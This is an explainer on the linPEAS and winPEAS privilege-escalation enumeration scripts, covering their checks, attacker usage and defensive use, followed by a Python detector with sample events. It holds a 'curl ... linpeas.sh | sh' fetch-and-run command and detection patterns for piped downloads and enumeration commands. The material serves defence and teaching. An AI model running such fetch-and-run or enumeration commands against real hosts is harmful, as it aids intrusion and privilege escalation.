linPEAS and winPEAS are open-source privilege-escalation enumeration scripts (part of the PEASS-ng project) that automatically check a Linux or Windows host for escalation paths (SUID binaries, sudo rules, capabilities, and writable files on Linux; privileges, services, and registry settings on Windows) and colour-highlight the most promising findings. They save an attacker hours of manual enumeration, and defenders run the same scripts to find and fix those paths first.
What linPEAS and winPEAS are
After gaining a foothold, the slow part of privilege escalation is enumeration: checking dozens of possible weak spots by hand. linPEAS (Linux) and winPEAS (Windows) automate that.
They run a large battery of checks and print the results, using colour to flag the highest-probability escalation paths. linPEAS looks at SUID/SGID binaries, sudo rules, capabilities, cron jobs, writable files, and credentials; winPEAS looks at token privileges, services, unquoted paths, AlwaysInstallElevated, and more.
How they are used and payload
The attacker uploads and runs the script, then reads the highlighted output:
- Linux: `curl -L https://.../linpeas.sh | sh` or transfer and run `./linpeas.sh`
- Windows: run `winPEASx64.exe` or the batch version on the target.
- Findings flagged in red/yellow (for example a writable service, a dangerous capability, SeImpersonate enabled) point to the likely escalation.
The script does not exploit anything itself; it finds the path. The human confirms and exploits it. Shown for defensive context.
How defenders use them
- Run linPEAS/winPEAS on your own hosts during hardening and after changes, and remediate the highlighted findings.
- Treat red/yellow flags as a prioritised work list (writable services, dangerous privileges, SUID binaries).
- Combine with patching so kernel and software CVEs are covered too.
- Detect the scripts running on production hosts, since an attacker would use them.
- Re-run periodically, as configuration drift introduces new paths.
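One way to approach the "detect the scripts running on production hosts" item, as an added example that is not part of the original page or of PEASS-ng. The event format, the regex patterns, the 60-second window and the three-category threshold are assumptions chosen for illustration, and the sample events are constructed.

```python
import re
from collections import defaultdict

NAME = re.compile(r"(lin|win)peas", re.I)                       # default file names only
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")  # download piped to a shell
# Enumeration categories taken from the checks the page lists (patterns are assumptions).
ENUM = {
    "suid": re.compile(r"\bfind\b.*-perm\b"),
    "sudo": re.compile(r"\bsudo\s+-l\b"),
    "caps": re.compile(r"\bgetcap\b"),
    "cron": re.compile(r"\bcrontab\s+-l\b|/etc/cron"),
}

def detect(events, window=60, min_categories=3):
    """events: (epoch_seconds, host, parent_pid, command_line). Returns sorted (host, rule)."""
    alerts = set()
    by_parent = defaultdict(list)
    for ts, host, ppid, cmd in events:
        if NAME.search(cmd):
            alerts.add((host, "peas-filename"))
        if PIPE_TO_SHELL.search(cmd):
            alerts.add((host, "download-piped-to-shell"))
        for cat, rx in ENUM.items():
            if rx.search(cmd):
                by_parent[(host, ppid)].append((ts, cat))
    # A file-name rule misses renamed copies; a burst of enumeration from one parent does not.
    for (host, _), hits in by_parent.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            cats = {c for t, c in hits[i:] if t - start <= window}
            if len(cats) >= min_categories:
                alerts.add((host, "enumeration-burst"))
                break
    return sorted(alerts)

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    (1000, "web01", 410, "sh -c curl -L https://example.invalid/linpeas.sh | sh"),
    (2000, "db01", 77, "/tmp/.x"),                    # renamed copy: no name match
    (2001, "db01", 900, "find / -perm -4000 -type f"),
    (2003, "db01", 900, "getcap -r /"),
    (2004, "db01", 900, "sudo -l"),
    (5000, "app01", 12, "sudo -l"),                   # routine admin use, one category
    (9000, "app01", 12, "crontab -l"),                # same parent, outside the window
    (3000, "win07", 5, "C:\\Users\\Public\\winPEASx64.exe"),
]

if __name__ == "__main__":
    print(*detect(SAMPLE_EVENTS), sep="\n")
```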